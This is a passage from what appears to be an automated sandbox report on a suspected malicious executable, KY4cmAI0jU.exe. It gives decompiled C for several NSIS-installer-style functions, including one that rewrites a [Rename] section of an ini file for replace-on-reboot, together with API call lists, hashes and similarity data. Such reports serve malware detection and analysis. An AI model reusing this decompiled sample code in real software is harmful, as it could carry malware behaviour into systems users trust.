					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                        0x004058ba
                                                                                                        0x004058c1
                                                                                                        0x004058c5
                                                                                                        0x004058ce
                                                                                                        0x004058d2
                                                                                                        0x00405a11
                                                                                                        0x00405a11
                                                                                                        0x00000000
                                                                                                        0x00405a11
                                                                                                        0x004058d2
                                                                                                        0x004058de
                                                                                                        0x004058f4
                                                                                                        0x0040591c
                                                                                                        0x00405927
                                                                                                        0x0040592b
                                                                                                        0x0040594b
                                                                                                        0x00405952
                                                                                                        0x0040595c
                                                                                                        0x00405969
                                                                                                        0x0040596e
                                                                                                        0x00405973
                                                                                                        0x00405977
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405986
                                                                                                        0x00405988
                                                                                                        0x00405995
                                                                                                        0x00405999
                                                                                                        0x00405a0a
                                                                                                        0x00405a0b
                                                                                                        0x00000000
                                                                                                        0x004059b5
                                                                                                        0x004059c2
                                                                                                        0x00405a27
                                                                                                        0x00405a2e
                                                                                                        0x004059d5
                                                                                                        0x004059d5
                                                                                                        0x004059d7
                                                                                                        0x004059e0
                                                                                                        0x004059eb
                                                                                                        0x004059fd
                                                                                                        0x00405a04
                                                                                                        0x00000000
                                                                                                        0x00405a04
                                                                                                        0x00405a30
                                                                                                        0x00405a31
                                                                                                        0x00405a36
                                                                                                        0x00405a38
                                                                                                        0x00405a45
                                                                                                        0x00405a45
                                                                                                        0x00405a49
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a3a
                                                                                                        0x00405a3a
                                                                                                        0x00405a3d
                                                                                                        0x00405a40
                                                                                                        0x00405a41
                                                                                                        0x00000000
                                                                                                        0x00405a3a
                                                                                                        0x004059cd
                                                                                                        0x004059d2
                                                                                                        0x00000000
                                                                                                        0x004059d2
                                                                                                        0x00405999
                                                                                                        0x004058f6
                                                                                                        0x00405901
                                                                                                        0x0040590a
                                                                                                        0x0040590e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040590e
                                                                                                        0x00405a1b

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                        • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                        • wsprintfA.USER32 ref: 00405945
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                        • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                          • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                          • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                        • String ID: %s=%s$0&B$[Rename]
                                                                                                        • API String ID: 3772915668-951905037
                                                                                                        • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                        • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                        • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                        • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 737524D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E737524D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73751215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73752626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7375307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7375309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73751429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7375405c);
								goto L17;
							case 4:
								__ecx =  *0x7375405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7375405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7375405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73754000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E737512D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73751266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                                        0x737524e4
                                                                                                        0x737524e6
                                                                                                        0x737524f0
                                                                                                        0x737524f6
                                                                                                        0x73752500
                                                                                                        0x73752504
                                                                                                        0x73752509
                                                                                                        0x73752509
                                                                                                        0x73752511
                                                                                                        0x73752518
                                                                                                        0x7375251e
                                                                                                        0x00000000
                                                                                                        0x73752525
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375252c
                                                                                                        0x73752530
                                                                                                        0x73752533
                                                                                                        0x73752537
                                                                                                        0x7375253e
                                                                                                        0x73752542
                                                                                                        0x73752548
                                                                                                        0x7375254a
                                                                                                        0x7375254c
                                                                                                        0x7375254c
                                                                                                        0x73752553
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375255c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375256c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73752598
                                                                                                        0x737525a0
                                                                                                        0x737525aa
                                                                                                        0x737525ac
                                                                                                        0x737525b1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73752574
                                                                                                        0x73752578
                                                                                                        0x7375257a
                                                                                                        0x7375257b
                                                                                                        0x7375257d
                                                                                                        0x7375258d
                                                                                                        0x73752594
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737525b7
                                                                                                        0x737525b9
                                                                                                        0x737525bf
                                                                                                        0x737525c5
                                                                                                        0x737525c5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375251e
                                                                                                        0x737525c8
                                                                                                        0x737525c8
                                                                                                        0x737525cd
                                                                                                        0x737525de
                                                                                                        0x737525de
                                                                                                        0x737525e4
                                                                                                        0x737525e9
                                                                                                        0x737525ee
                                                                                                        0x737525fa
                                                                                                        0x737525ff
                                                                                                        0x00000000
                                                                                                        0x73752604
                                                                                                        0x737525f0
                                                                                                        0x737525f1
                                                                                                        0x73752605
                                                                                                        0x73752605
                                                                                                        0x737525ee
                                                                                                        0x73752606
                                                                                                        0x7375260a
                                                                                                        0x7375260d
                                                                                                        0x73752625

                                                                                                        APIs
                                                                                                          • Part of subcall function 73751215: GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                        • GlobalFree.KERNEL32 ref: 737525DE
                                                                                                        • GlobalFree.KERNEL32 ref: 73752618
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID: {t@ut
                                                                                                        • API String ID: 1780285237-3262140062
                                                                                                        • Opcode ID: c586002a2bf1a82194d35a60e67e78681772914a3849d57eb7c8971a03d27bce
                                                                                                        • Instruction ID: 5b5ae61f6aa46f5e07942084b7e3a1974dd2f23182abd7b633b0ad4f2aa069e6
                                                                                                        • Opcode Fuzzy Hash: c586002a2bf1a82194d35a60e67e78681772914a3849d57eb7c8971a03d27bce
                                                                                                        • Instruction Fuzzy Hash: 28411073204209EFE70E9F54CC98F2A77BAEB85310B2445ADF54AD7160DB359904DB71
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 737522F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E737522F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E737512AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7375123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7375247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E737512FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E737512FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73751224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7375405c =  *0x7375405c +  *0x7375405c;
									__edi = GlobalAlloc(0x40,  *0x7375405c +  *0x7375405c);
									 *0x7375405c = MultiByteToWideChar(0, 0, __ebx,  *0x7375405c, __edi,  *0x7375405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E737512FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7375405c;
									__esi = __esi +  *0x73754064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73751429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73751224(0x73754034);
					goto L10;
				}
			}












                                                                                                        0x73752306
                                                                                                        0x7375230a
                                                                                                        0x73752315
                                                                                                        0x73752315
                                                                                                        0x7375231c
                                                                                                        0x73752321
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73752325
                                                                                                        0x73752328
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375232d
                                                                                                        0x73752338
                                                                                                        0x73752348
                                                                                                        0x7375233f
                                                                                                        0x73752341
                                                                                                        0x73752357
                                                                                                        0x73752357
                                                                                                        0x00000000
                                                                                                        0x7375232f
                                                                                                        0x7375232f
                                                                                                        0x73752358
                                                                                                        0x7375235c
                                                                                                        0x7375235e
                                                                                                        0x7375235e
                                                                                                        0x73752361
                                                                                                        0x73752361
                                                                                                        0x73752369
                                                                                                        0x7375236c
                                                                                                        0x73752373
                                                                                                        0x73752377
                                                                                                        0x73752446
                                                                                                        0x73752447
                                                                                                        0x73752452
                                                                                                        0x7375247d
                                                                                                        0x7375247d
                                                                                                        0x73752462
                                                                                                        0x7375246e
                                                                                                        0x73752464
                                                                                                        0x73752464
                                                                                                        0x73752464
                                                                                                        0x00000000
                                                                                                        0x7375237d
                                                                                                        0x7375237d
                                                                                                        0x00000000
                                                                                                        0x73752384
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375238d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375239b
                                                                                                        0x7375239e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737523a7
                                                                                                        0x737523ac
                                                                                                        0x737523af
                                                                                                        0x737523b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737523bd
                                                                                                        0x737523c8
                                                                                                        0x737523d7
                                                                                                        0x737523e2
                                                                                                        0x73752405
                                                                                                        0x73752408
                                                                                                        0x737523e4
                                                                                                        0x737523e8
                                                                                                        0x737523ee
                                                                                                        0x737523ef
                                                                                                        0x737523f2
                                                                                                        0x737523f3
                                                                                                        0x737523f6
                                                                                                        0x737523fd
                                                                                                        0x737523fd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73752410
                                                                                                        0x73752413
                                                                                                        0x7375241f
                                                                                                        0x73752421
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73752424
                                                                                                        0x73752427
                                                                                                        0x73752428
                                                                                                        0x7375242f
                                                                                                        0x73752436
                                                                                                        0x73752439
                                                                                                        0x7375243b
                                                                                                        0x7375243e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375237d
                                                                                                        0x73752377
                                                                                                        0x7375234d
                                                                                                        0x73752352
                                                                                                        0x00000000
                                                                                                        0x73752352

                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32 ref: 73752447
                                                                                                          • Part of subcall function 73751224: lstrcpynA.KERNEL32(00000000,?,737512CF,-7375404B,737511AB,-000000A0), ref: 73751234
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 737523C2
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 737523D7
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 737523E8
                                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 737523F6
                                                                                                        • GlobalFree.KERNEL32 ref: 737523FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                        • String ID: @ut
                                                                                                        • API String ID: 3730416702-3384101347
                                                                                                        • Opcode ID: d69b355592fe1ed8c0202f97d2b4e8587badd2cd660139b168f0655e19fd59bb
                                                                                                        • Instruction ID: 7fb1697f00d685657d02dac92c51679973414d284ac88564d84ddcd2e3249f21
                                                                                                        • Opcode Fuzzy Hash: d69b355592fe1ed8c0202f97d2b4e8587badd2cd660139b168f0655e19fd59bb
                                                                                                        • Instruction Fuzzy Hash: B641C1B2A04349DFE71D9F20C948B6AB7F9FF44312F24481AF48ACB190D7349944CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                        0x00405dca
                                                                                                        0x00405dd2
                                                                                                        0x00405de6
                                                                                                        0x00405de6
                                                                                                        0x00405dec
                                                                                                        0x00405df9
                                                                                                        0x00405df9
                                                                                                        0x00405dfa
                                                                                                        0x00405dfc
                                                                                                        0x00405e00
                                                                                                        0x00405e02
                                                                                                        0x00405e0b
                                                                                                        0x00405e0d
                                                                                                        0x00405e27
                                                                                                        0x00405e2f
                                                                                                        0x00405e2f
                                                                                                        0x00405e34
                                                                                                        0x00405e36
                                                                                                        0x00405e38
                                                                                                        0x00405e3c
                                                                                                        0x00405e3d
                                                                                                        0x00405e40
                                                                                                        0x00405e48
                                                                                                        0x00405e4a
                                                                                                        0x00405e4e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405e54
                                                                                                        0x00405e59
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405e59
                                                                                                        0x00405e5e

                                                                                                        APIs
                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                        • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                        • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-501919934
                                                                                                        • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                        • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                        • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                        • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                        0x00403f91
                                                                                                        0x00404025
                                                                                                        0x00000000
                                                                                                        0x00404025
                                                                                                        0x00403fa2
                                                                                                        0x00403fa6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403fac
                                                                                                        0x00403fb5
                                                                                                        0x00403fb8
                                                                                                        0x00403fb8
                                                                                                        0x00403fbe
                                                                                                        0x00403fc4
                                                                                                        0x00403fc4
                                                                                                        0x00403fd0
                                                                                                        0x00403fd6
                                                                                                        0x00403fdd
                                                                                                        0x00403fe0
                                                                                                        0x00403fe3
                                                                                                        0x00403fe5
                                                                                                        0x00403fe5
                                                                                                        0x00403fed
                                                                                                        0x00403ff3
                                                                                                        0x00403ff3
                                                                                                        0x00403ffd
                                                                                                        0x00404002
                                                                                                        0x00404005
                                                                                                        0x0040400a
                                                                                                        0x0040400d
                                                                                                        0x0040400d
                                                                                                        0x0040401d
                                                                                                        0x0040401d
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                        • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                        • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
